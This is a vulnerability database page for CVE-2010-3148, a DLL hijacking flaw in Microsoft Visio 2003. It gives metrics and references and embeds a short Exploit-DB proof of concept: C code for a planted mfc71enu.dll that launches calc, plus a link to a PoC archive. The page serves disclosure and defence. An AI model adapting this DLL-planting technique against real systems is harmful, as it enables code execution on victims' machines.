CVE-2010-3148 : Detail

CVE-2010-3148

38.16%V3
Network
2010-08-27
16h10 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in Microsoft Visio 2003 SP3 allows local users to gain privileges via a Trojan horse mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .vsd, .vdx, .vst, or .vtx file, aka "Microsoft Visio Insecure Library Loading Vulnerability."

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 14744

Publication date : 2010-08-24 22h00 +00:00
Author : Beenu Arora
EDB Verified : No

/* Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles , Dinesh Arora Exploit Title: Microsoft Visio 2003 DLL Hijacking Exploit Date: 25/08/2010 Author: Beenu Arora Tested on: Windows XP SP3 Vulnerable extensions: .vtx Compile and rename to mfc71enu.dll, create a file in the same dir with one of the following extensions: .vtx */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void hook_startup() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } // POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip

Products Mentioned

Configuraton 0

Microsoft>>Visio >> Version 2003

References

http://www.vupen.com/english/advisories/2010/2192
Tags : vdb-entry, x_refsource_VUPEN
http://www.us-cert.gov/cas/techalerts/TA11-193A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.exploit-db.com/exploits/14744/
Tags : exploit, x_refsource_EXPLOIT-DB